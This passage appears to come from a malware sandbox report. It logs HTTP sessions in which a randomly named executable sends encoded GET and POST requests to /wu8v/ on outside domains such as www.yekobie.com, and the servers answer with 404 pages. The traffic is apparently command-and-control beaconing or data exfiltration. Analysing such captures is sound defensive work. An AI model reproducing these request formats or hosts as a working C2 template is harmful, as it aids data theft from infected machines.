                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 54 7a 54 53 54 41 63 75 43 53 32 4a 52 71 72 6c 4d 64 78 79 4e 45 37 42 69 76 4f 57 44 52 72 41 2b 41 46 52 6b 6a 6d 47 4b 71 35 74 44 5a 2f 68 37 32 76 67 77 57 34 58 6e 37 35 6b 49 58 30 41 42 75 55 39 58 79 7a 77 4a 70 5a 79 31 4b 4c 61 36 42 54 61 65 77 44 57 70 47 6c 4b 2f 6e 46 6f 56 56 53 41 78 4d 4e 6b 33 51 62 58 57 45 6a 33 65 75 42 50 76 2f 37 77 38 35 31 65 61 71 4b 35 4e 71 71 4b 37 65 63 2f 52 36 39 5a 55 42 38 33 6e 6b 65 6e 73 71 71 4f 4d 62 30 55 47 53 62 7a 7a 6e 71 6c 2b 45 62 4e 62 42 4d 31 77 4c 64 41 4c 53 6d 6a 75 56 72 71 6c 6a 73 49 31 4e 75 37 75 49 37 7a 39 6e 70 43 57 30 56 46 45 43 2b 58 53 45 30 32 75 79 33 73 63 4e 73 76 6b 4c 37 34 57 4c 57 53 70 48 37 63 63 4f 4c 68 46 67 32 7a 4f 31 70 57 4e 45 31 41 64 67 72 68 52 76 46 54 67 37 52 6a 45 71 6f 44 73 77 63 78 33 78 4f 6b 54 59 2f 57 5a 59 76 62 62 50 50 32 75 4d 53 38 79 65 58 56 67 35 54 72 70 4f 79 2f 47 75 76 58 4d 34 38 6e 2f 37 4f 42 59 77 6d 49 6f 43 46 67 67 38 55 33 79 48 47 46 6f 63 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=TzTSTAcuCS2JRqrlMdxyNE7BivOWDRrA+AFRkjmGKq5tDZ/h72vgwW4Xn75kIX0ABuU9XyzwJpZy1KLa6BTaewDWpGlK/nFoVVSAxMNk3QbXWEj3euBPv/7w851eaqK5NqqK7ec/R69ZUB83nkensqqOMb0UGSbzznql+EbNbBM1wLdALSmjuVrqljsI1Nu7uI7z9npCW0VFEC+XSE02uy3scNsvkL74WLWSpH7ccOLhFg2zO1pWNE1AdgrhRvFTg7RjEqoDswcx3xOkTY/WZYvbbPP2uMS8yeXVg5TrpOy/GuvXM48n/7OBYwmIoCFgg8U3yHGFocKVsM/q8yDjtvthEhYOyNvEdfGyFMNiWxyERhObVk8i8cm5ksnzRbfXCn57OWlAJCTZxFKf/qwPBCyRr8E11pt0ORYlrn10vQUtocpoQziuFfZY5sBZVG5XG9WyNZDPl1iDC0y77TajuqCARuNFReJGGtfUjkHnQ/6DjgqNgTGDufrfO+M4n4XFnK/zzh5ZGxiZkgrdE4MBgUuAsaWyHPm4GOfLSwXP2CV29HeXjyTZLDlnyiuIBbdzS6SSNvjUofYAnwfv/Yp5C8S0RKytfCw2rcVdXD0xjnkSziaA4S470Fy8rQn2RxHw3ne8OudwsecnDwYQvJMRiSJgcbFoZTrSWJOzBWdPofJBKR+nIHIN0M80HTB8PCoBInnYawQJrkN7pd0SyEWxVGCg2ehkF+yjlwKuo+UnT46SbwZECZ9vBfWO6HUrKl12cHAI3ZJChOuwpkHSGq1w7vNNrg6UPoraWpnzHXoGKV24kVOC83gL79pJubQxjLAni5QMJzRgDWcLiqWiiADpxQmngT1kNID0bxK0OCkAjrq5WXUIF6dETZ8rwWkOKnIUFnjwnJo1WoBvUt2zyhjX0V9f3d97Ae2Skxwnap9pXublBZfj7q9sl/ZQDvZKo2Vgz2Wb4QrvxQuP1zki2A1LRh20dSVk/WJ/UHH/WF2Ir1IO [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:51.089790106 CEST533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:50 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.449763203.161.46.103802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:53.601408958 CEST455OUTGET /wu8v/?MdtlcTm=ex7yQ3cnGheAaOrzEPkQGznKrbGAUhLo9VsCiDPBWJ5DUtj6oFWZ51Qu3bZCInwfBew3O0jwDr4r/fHP0DTqez+F51VR4AlcQUWQ9cVyxEHzKlzGRO1dndY=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:53.811425924 CEST548INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:53 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.449764185.135.132.99802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:59.840877056 CEST715OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 6a 61 61 73 74 6c 73 62 33 4c 58 51 71 51 46 65 4b 2f 42 5a 69 2b 47 43 52 57 5a 7a 73 62 4a 65 61 6d 4b 65 54 41 43 31 44 4a 34 79 4a 43 50 76 34 49 6e 39 32 4c 79 49 4b 77 64 58 34 4c 34 78 70 53 63 34 79 53 36 41 46 59 58 4e 6a 57 4e 39 52 47 45 5a 6e 76 63 39 51 6c 47 67 56 52 76 4b 34 55 6c 53 73 39 4e 6d 6a 76 79 4c 71 4e 71 38 67 41 78 78 31 6f 64 38 6e 67 35 57 36 6c 51 46 58 39 76 44 2b 66 52 68 63 78 4c 47 58 43 31 64 75 46 79 68 39 31 58 4b 34 35 6c 52 64 4f 77 6d 4e 36 2f 41 55 37 55 44 71 48 76 54 53 73 42 4c 63 64 48 50 58 42 45 2f 49 2b 6b 79 69 48 48 6a 67 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=Xjaastlsb3LXQqQFeK/BZi+GCRWZzsbJeamKeTAC1DJ4yJCPv4In92LyIKwdX4L4xpSc4yS6AFYXNjWN9RGEZnvc9QlGgVRvK4UlSs9NmjvyLqNq8gAxx1od8ng5W6lQFX9vD+fRhcxLGXC1duFyh91XK45lRdOwmN6/AU7UDqHvTSsBLcdHPXBE/I+kyiHHjg==
                                                                                                                    May 8, 2024 14:07:00.154747009 CEST1048INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 33 36 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 ec c6 31 b6 59 db 40 1b 7b 11 03 69 13 24 2a 8a 1c 29 69 64 11 a1 38 5a 92 8a 62 a0 7f 28 e7 fd 09 f9 63 3b 14 ed 6c fa b1 27 99 e4 bc f7 66 de cc 78 f1 6e 7d 7d 91 dd df 6c e0 32 fb 7c 05 37 5f 3f 5d 6d 2f 20 8a d3 f4 db e9 45 9a ae b3 75 78 98 25 93 69 9a 6e be 44 10 d5 ce b5 e7 69 da f7 7d d2 9f 26 64 76 69 76 9b d6 ae 51 b3 d4 3a 23 0b 97 94 ae 8c 56 a3 85 bf 03 25 f4 6e 19 55 66 b8 40 51 f2 7d 83 4e 80 67 89 f1 ef 4e 3e 2e a3 0b d2 0e b5 8b b3 7d 8b 11 14 e1 b4 8c 1c 3e b9 81 f8 4f 28 6a 61 2c ba 65 e7 aa f8 0f 4f 35 70 68 d1 e0 32 32 94 93 b3 6f 70 9a 34 8e 35 49 5d e2 13 7f 2b 52 8a fa 57 d0 5b e1 42 14 35 c6 5e d0 90 fa 81 21 1e 9e 7e 0b 6a 8d d8 35 e2 7f a2 b3 6d 76 b5 59 cd 26 33 f8 42 0e fe a2 4e 97 8b 34 5c 8e 16 e9 e5 e6 e3 9a 93 ff 74 bd be e7 cf e5 74 f5 26 88 4f a3 ac 46 30 6c 0a 5a 87 25 94 54 74 0d fb 02 bd b0 a0 99 ae f2 74 40 1a 5c 2d 2d 58 34 8f 68 92 d1 e2 c6 73 dd 1e 09 35 64 86 ba c7 97 [TRUNCATED]
                                                                                                                    Data Ascii: 36duTMo8WLu1Y@{i$*)id8Zb(c;l'fxn}}l2|7_?]m/ Eux%inDi}&dvivQ:#V%nUf@Q}NgN>.}>O(ja,eO5ph22op45I]+RW[B5^!~j5mvY&3BN4\tt&OF0lZ%Ttt@\--X4hs5dgc+FI_x3P`~%%z&d!?r__eI?0\o7ww7nW%&5nGY6]ty5/f$Ord_hx#Nj?0drP],Y_@}E]GY6lZE;;CB4r5BhBV>G2cv gmHgQ+{`")}f8@tYLn"TT`{Jal\a2O'UAe5ADm%VS.Z=3~`$.PS}xxV1z2iCGcG$;WIVVln#?|DYW;GWCZ6]so&|S=u'\Zy]x/@F0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.449765185.135.132.99802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:02.718429089 CEST735OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 6a 61 61 73 74 6c 73 62 33 4c 58 54 4a 49 46 63 70 58 42 59 43 2b 48 4e 78 57 5a 36 4d 62 4e 65 61 71 4b 65 53 45 53 31 51 74 34 31 72 61 50 75 38 6b 6e 7a 57 4c 79 44 71 77 63 59 59 4b 30 78 70 65 55 34 33 71 36 41 46 4d 58 4e 6d 36 4e 39 67 47 44 61 58 76 65 78 77 6c 45 39 46 52 76 4b 34 55 6c 53 73 70 6a 6d 6a 33 79 4c 61 64 71 75 56 30 32 76 6c 6f 65 73 58 67 35 53 36 6c 63 46 58 39 4a 44 2f 44 72 68 65 35 4c 47 57 79 31 65 2f 46 78 76 39 30 39 48 59 35 33 5a 34 6e 48 6f 39 69 7a 4f 58 62 6c 4d 4a 4c 2b 62 30 39 62 61 74 38 51 64 58 6c 33 69 50 33 51 2f 68 36 4f 34 74 44 4f 76 4a 6f 43 63 56 44 61 39 6a 6d 63 56 78 6f 4e 77 42 73 3d
                                                                                                                    Data Ascii: MdtlcTm=Xjaastlsb3LXTJIFcpXBYC+HNxWZ6MbNeaqKeSES1Qt41raPu8knzWLyDqwcYYK0xpeU43q6AFMXNm6N9gGDaXvexwlE9FRvK4UlSspjmj3yLadquV02vloesXg5S6lcFX9JD/Drhe5LGWy1e/Fxv909HY53Z4nHo9izOXblMJL+b09bat8QdXl3iP3Q/h6O4tDOvJoCcVDa9jmcVxoNwBs=
                                                                                                                    May 8, 2024 14:07:03.030030012 CEST1048INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 33 36 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 53 e3 38 10 bd e7 57 f4 f8 c2 05 db 04 02 33 c3 26 a9 9a 21 d9 22 55 cc 40 81 a7 a6 38 2a 72 3b 56 21 ab bd 92 8c 49 d5 fe 21 ce fb 13 f8 63 db b2 12 96 f9 d8 93 23 a9 df 7b dd af bb 33 7d b7 b8 be 28 ee 6f 96 70 59 7c b9 82 9b 6f 9f af 56 17 90 a4 79 fe fd e4 22 cf 17 c5 22 3e 4c b2 a3 71 9e 2f bf 26 90 d4 de b7 e7 79 de f7 7d d6 9f 64 64 37 79 71 9b d7 be d1 93 dc 79 ab a4 cf 4a 5f 26 f3 d1 34 dc 81 16 66 33 4b 2a 3b 5c a0 28 f9 be 41 2f 20 b0 a4 f8 57 a7 1e 67 c9 05 19 8f c6 a7 c5 b6 c5 04 64 3c cd 12 8f 4f 7e 20 fe 03 64 2d ac 43 3f eb 7c 95 7e 08 54 03 87 11 0d ce 12 4b 6b f2 ee 0d ce 90 c1 43 43 ca 94 f8 c4 df 8a b4 a6 fe 15 f4 56 58 0a 59 63 1a 04 2d e9 1f 18 d2 e1 e9 b7 a0 d6 8a 4d 23 fe 27 ba 58 15 57 cb f9 e4 68 02 5f c9 c3 9f d4 99 72 9a c7 cb d1 34 bf 5c 7e 5a 70 f2 9f af 17 f7 fc b9 1c cf df 04 f1 69 54 d4 08 96 4d 41 e7 b1 84 92 64 d7 b0 2f d0 0b 07 86 e9 aa 40 07 64 c0 d7 ca 81 43 fb 88 36 1b 4d 6f 02 d7 ed 9e d0 40 61 a9 7b 7c 79 [TRUNCATED]
                                                                                                                    Data Ascii: 36duTMS8W3&!"U@8*r;V!I!c#{3}(opY|oVy"">Lq/&y}dd7yqyJ_&4f3K*;\(A/ Wgd<O~ d-C?|~TKkCCVXYc-M#'XWh_r4\~ZpiTMAd/@dC6Mo@a{|yf9xJl)_h:#o+1,()R/+5#2`~A(h V%i]GqwCE b->Za&zlz;<e^Vs'd,8e_yh4}#Hz{_P],Y_>,'X,[O&UCTE`S%{A{xburE*% L1*#1;~:L"e:uAye&Q?/^yY3Zk,#"5\AW5fh7JtgQk{uBDD6u(j0F@OAbpN5sro"{Smes5A(FjQbhQM~q"K_[=e)_/d0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.449766185.135.132.99802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:05.611547947 CEST10817OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 58 6a 61 61 73 74 6c 73 62 33 4c 58 54 4a 49 46 63 70 58 42 59 43 2b 48 4e 78 57 5a 36 4d 62 4e 65 61 71 4b 65 53 45 53 31 51 6c 34 79 59 53 50 76 62 77 6e 79 57 4c 79 4b 4b 77 52 59 59 4c 75 78 71 75 51 34 33 75 31 41 48 30 58 66 77 75 4e 37 56 6d 44 42 48 76 65 2f 67 6c 48 67 56 52 41 4b 34 45 70 53 73 35 6a 6d 6a 33 79 4c 63 68 71 2b 51 41 32 74 6c 6f 64 38 6e 67 39 57 36 6c 77 46 58 6b 38 44 38 75 4a 69 75 5a 4c 47 32 69 31 62 4a 70 78 6a 39 31 62 45 59 34 6b 5a 34 6a 59 6f 39 2f 41 4f 57 2f 44 4d 4f 44 2b 66 69 63 38 47 73 4e 4b 65 58 4e 73 2b 74 6e 36 34 54 69 43 31 65 33 79 6a 37 41 65 49 31 65 35 7a 45 58 49 46 52 34 50 79 32 2b 57 69 6f 62 73 54 2f 76 59 6e 69 74 2f 43 61 6b 37 48 52 75 5a 31 55 6f 42 54 4a 79 72 65 61 66 6a 2f 4e 32 31 50 4d 6c 74 33 4e 43 69 30 4f 6a 2f 55 68 32 42 76 44 5a 47 79 34 78 34 67 78 50 35 79 42 2f 58 75 32 63 36 4a 5a 2f 66 58 45 67 6f 43 65 68 4a 51 34 64 6d 69 56 67 36 59 6a 2b 78 4e 4f 56 68 6f 33 78 59 7a 68 38 4e 33 74 30 38 42 4b [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=Xjaastlsb3LXTJIFcpXBYC+HNxWZ6MbNeaqKeSES1Ql4yYSPvbwnyWLyKKwRYYLuxquQ43u1AH0XfwuN7VmDBHve/glHgVRAK4EpSs5jmj3yLchq+QA2tlod8ng9W6lwFXk8D8uJiuZLG2i1bJpxj91bEY4kZ4jYo9/AOW/DMOD+fic8GsNKeXNs+tn64TiC1e3yj7AeI1e5zEXIFR4Py2+WiobsT/vYnit/Cak7HRuZ1UoBTJyreafj/N21PMlt3NCi0Oj/Uh2BvDZGy4x4gxP5yB/Xu2c6JZ/fXEgoCehJQ4dmiVg6Yj+xNOVho3xYzh8N3t08BKPlV0ibKwOHOpLdls1hGK819QX3G0idxWqSlJ5fhM7wvvntjOMZYpnMJQBPThe+MtLqGy8gL04X83R1lJZNFgo2UstBE0djvUypXjO5lGdHO3YSikzBeAWb4xuCXeFUKqd+2Rc4HHPS68EGdjmOhZVtJfjou3jMLBwywwoS1hCAC32ecXc0bLGXOtrlv46m3rh84N07Y0hDYJA/6uaX+tRv51qAr4R2UWAuDfGrGXaYVArpWkd3mhs1+ZoP51Hh7DMFhkM6kgUfpgbK/LdtDpNswIS1hQXGjOOG7KknaGbj4akuzEcLn5gWaY9+EZAQopkpu+DbHVAr3WIMlyG99iuwS+fmNCXVQ3XaWLGfh77BtI1NAuc11Fs/r/wl25yLJlhBxVjyAuwVkez0djzLNQ0Odp/jKgmcBWoSBiOgZewbvBYV19IVkFhvKH5uJmhqvZwTiXwX4BXlIoj0mUD1bJx5OrsmVGuJPRRpbtsoPuaHVvBoWH/pyKRpwFVparvM4gVdoGo97t8dK4tjhGk/u182HYpitEnUN+1H7KfTp7NDTaO37MgSNccL9nCAcDIzDL8Mj+4L/XD07qmgh91AVi2/X5h9gOOTNcFTU0xzWwbUEqxdCZyxpHIzfV/9XR9MB9qIx6fvErWyN1zGwEtcZNo+wlY0MgeFO/yB [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:05.926081896 CEST1046INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a d8 e9 06 59 db 40 1b 7b 11 03 69 13 24 2a 8a 1c 69 71 64 11 a1 38 5a 92 8a 62 a0 7f 28 e7 fd 09 f9 63 3b 14 ed 6c fa b1 27 99 e4 bc f7 66 de cc 78 f6 6e 79 7d 51 dc df ac e0 b2 f8 7c 05 37 5f 3f 5d ad 2f 20 49 f3 fc db e4 22 cf 97 c5 32 3e 4c b3 f7 c7 79 be fa 92 40 52 7b df 9e e7 79 df f7 59 3f c9 c8 6e f3 e2 36 af 7d a3 a7 b9 f3 56 95 3e 93 5e 26 8b d1 2c dc 81 16 66 3b 4f 2a 3b 5c a0 90 7c df a0 17 10 58 52 fc bb 53 8f f3 e4 82 8c 47 e3 d3 62 d7 62 02 65 3c cd 13 8f 4f 7e 20 fe 13 ca 5a 58 87 7e de f9 2a 3d 0b 54 03 87 11 0d ce 13 4b 1b f2 ee 0d ce 90 c1 b1 21 65 24 3e f1 b7 22 ad a9 7f 05 bd 15 2e 45 59 63 1a 04 2d e9 1f 18 d2 e1 e9 b7 a0 d6 8a 6d 23 fe 27 ba 58 17 57 ab c5 f4 fd 14 be 90 87 bf a8 33 72 96 c7 cb d1 2c bf 5c 7d 5c 72 f2 9f ae 97 f7 fc b9 3c 5e bc 09 e2 d3 a8 a8 11 2c 9b 82 ce a3 04 49 65 d7 b0 2f d0 0b 07 86 e9 aa 40 07 64 c0 d7 ca 81 43 fb 88 36 1b cd 6e 02 d7 ed 81 d0 40 61 a9 7b 7c 79 [TRUNCATED]
                                                                                                                    Data Ascii: 36buTMo8WLuY@{i$*iqd8Zb(c;l'fxny}Q|7_?]/ I"2>Ly@R{yY?n6}V>^&,f;O*;\|XRSGbbe<O~ ZX~*=TK!e$>".EYc-m#'XW3r,\}\r<^,Ie/@dC6n@a{|yf9x$6g0GZ&}y|C<BVfpJH+JMHRy~T0F 4+I?0\.oWww7PkQ|-wYe6Ga:gd3=='WY@~1Rj*3*-9<ly0GPRkekdCcald4"pOOl^#NZ,UJ>"Hs$S1q6E2J&2dV#dyP3kx@T\|Y3Zkp.yRUQW?@XA4-YZ@^s dmJhZ.$}\/eoSMwG:MdojrZ,vfs##BbbQ=jZ2}>}6(n;-CVmk{Gt1Nz0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.449767185.135.132.99802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:08.446465015 CEST454OUTGET /wu8v/?MdtlcTm=ahy6va04TVDXAoc0SI77WnjdL1KdrpLWXquRcgE4oyJhjsOsnbVcxGfgc5U1b6nV6qG/kRi3KVZWLm+W9jeCK1XNsz8i7l9KE7k2fsNVpgLsbvF63CsRx24=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:08.758023024 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
